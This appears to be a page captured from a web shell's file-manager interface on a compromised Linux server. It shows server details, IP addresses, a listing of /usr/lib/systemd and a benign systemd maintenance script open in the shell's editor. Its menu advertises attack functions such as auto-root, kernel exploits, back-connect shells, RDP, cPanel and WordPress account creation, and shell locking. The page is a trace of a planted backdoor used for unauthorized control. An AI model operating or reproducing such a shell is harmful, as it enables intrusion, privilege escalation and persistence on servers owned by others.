Linux server1.sbs.cy 5.14.0-362.18.1.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jan 29 07:05:48 EST 2024 x86_64
Apache
: 199.192.25.12 | : 172.70.131.166
28 Domain
8.1.31
administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
boot
[ DIR ]
drwxr-xr-x
catalog
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-environment-generators
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
libsystemd-shared.abignore
100
B
-rw-r--r--
purge-nobody-user
2.3
KB
-rwxr-xr-x
resolv.conf
710
B
-rw-r--r--
systemd
95.93
KB
-rwxr-xr-x
systemd-ac-power
15.2
KB
-rwxr-xr-x
systemd-backlight
35.55
KB
-rwxr-xr-x
systemd-binfmt
23.49
KB
-rwxr-xr-x
systemd-bless-boot
31.78
KB
-rwxr-xr-x
systemd-boot-check-no-failures
15.48
KB
-rwxr-xr-x
systemd-cgroups-agent
15.41
KB
-rwxr-xr-x
systemd-coredump
67.89
KB
-rwxr-xr-x
systemd-cryptsetup
92.52
KB
-rwxr-xr-x
systemd-export
43.72
KB
-rwxr-xr-x
systemd-fsck
31.49
KB
-rwxr-xr-x
systemd-growfs
23.44
KB
-rwxr-xr-x
systemd-hibernate-resume
15.22
KB
-rwxr-xr-x
systemd-hostnamed
52.09
KB
-rwxr-xr-x
systemd-initctl
23.51
KB
-rwxr-xr-x
systemd-integritysetup
23.69
KB
-rwxr-xr-x
systemd-journald
181.33
KB
-rwxr-xr-x
systemd-localed
51.86
KB
-rwxr-xr-x
systemd-logind
295.91
KB
-rwxr-xr-x
systemd-makefs
15.41
KB
-rwxr-xr-x
systemd-measure
52.1
KB
-rwxr-xr-x
systemd-modules-load
23.72
KB
-rwxr-xr-x
systemd-network-generator
43.84
KB
-rwxr-xr-x
systemd-pcrphase
31.71
KB
-rwxr-xr-x
systemd-pstore
23.6
KB
-rwxr-xr-x
systemd-quotacheck
15.25
KB
-rwxr-xr-x
systemd-random-seed
27.47
KB
-rwxr-xr-x
systemd-remount-fs
19.46
KB
-rwxr-xr-x
systemd-reply-password
15.45
KB
-rwxr-xr-x
systemd-rfkill
23.53
KB
-rwxr-xr-x
systemd-shutdown
51.69
KB
-rwxr-xr-x
systemd-sleep
31.55
KB
-rwxr-xr-x
systemd-socket-proxyd
31.66
KB
-rwxr-xr-x
systemd-sulogin-shell
19.52
KB
-rwxr-xr-x
systemd-sysctl
27.73
KB
-rwxr-xr-x
systemd-sysroot-fstab-check
56.34
KB
-rwxr-xr-x
systemd-sysupdate
124.88
KB
-rwxr-xr-x
systemd-sysv-install
43.78
KB
-rwxr-xr-x
systemd-timedated
47.8
KB
-rwxr-xr-x
systemd-udevd
583.98
KB
-rwxr-xr-x
systemd-update-done
15.45
KB
-rwxr-xr-x
systemd-update-helper
3.76
KB
-rwxr-xr-x
systemd-update-utmp
23.53
KB
-rwxr-xr-x
systemd-user-runtime-dir
23.48
KB
-rwxr-xr-x
systemd-user-sessions
15.23
KB
-rwxr-xr-x
systemd-vconsole-setup
19.48
KB
-rwxr-xr-x
systemd-veritysetup
23.64
KB
-rwxr-xr-x
systemd-volatile-root
23.47
KB
-rwxr-xr-x
systemd-xdg-autostart-conditio...
15.47
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : purge-nobody-user
#!/usr/bin/bash -eu if [ $UID -ne 0 ]; then echo "WARNING: This script needs to run as root to be effective" exit 1 fi export SYSTEMD_NSS_BYPASS_SYNTHETIC=1 if [ "${1:-}" = "--ignore-journal" ]; then shift ignore_journal=1 else ignore_journal=0 fi echo "Checking processes..." if ps h -u 99 | grep .; then echo "ERROR: ps reports processes with UID 99!" exit 2 fi echo "... not found" echo "Checking UTMP..." if w -h 199 | grep . ; then echo "ERROR: w reports UID 99 as active!" exit 2 fi if w -h nobody | grep . ; then echo "ERROR: w reports user nobody as active!" exit 2 fi echo "... not found" echo "Checking the journal..." if [ "$ignore_journal" = 0 ] && journalctl -q -b -n10 _UID=99 | grep . ; then echo "ERROR: journalctl reports messages from UID 99 in current boot!" exit 2 fi echo "... not found" echo "Looking for files in /etc, /run, /tmp, and /var..." if find /etc /run /tmp /var -uid 99 -print | grep -m 10 . ; then echo "ERROR: found files belonging to UID 99" exit 2 fi echo "... not found" echo "Checking if nobody is defined correctly..." if getent passwd nobody | grep '^nobody:[x*]:65534:65534:.*:/:/sbin/nologin'; then echo "OK, nothing to do." exit 0 else echo "NOTICE: User nobody is not defined correctly" fi echo "Checking if nfsnobody or something else is using the uid..." if getent passwd 65534 | grep . ; then echo "NOTICE: will have to remove this user" else echo "... not found" fi if [ "${1:-}" = "-x" ]; then if getent passwd nobody >/dev/null; then # this will remove both the user and the group. ( set -x userdel nobody ) fi if getent passwd 65534 >/dev/null; then # Make sure the uid is unused. This should free gid too. name="$(getent passwd 65534 | cut -d: -f1)" ( set -x userdel "$name" ) fi if grep -qE '^(passwd|group):.*\bsss\b' /etc/nsswitch.conf; then echo "Sleeping, so sss can catch up" sleep 3 fi if getent group 65534; then # Make sure the gid is unused, even if uid wasn't. name="$(getent group 65534 | cut -d: -f1)" ( set -x groupdel "$name" ) fi # systemd-sysusers uses the same gid and uid ( set -x systemd-sysusers --inline 'u nobody 65534 "Kernel Overflow User" / /sbin/nologin' ) else echo "Pass '-x' to perform changes" fi
Close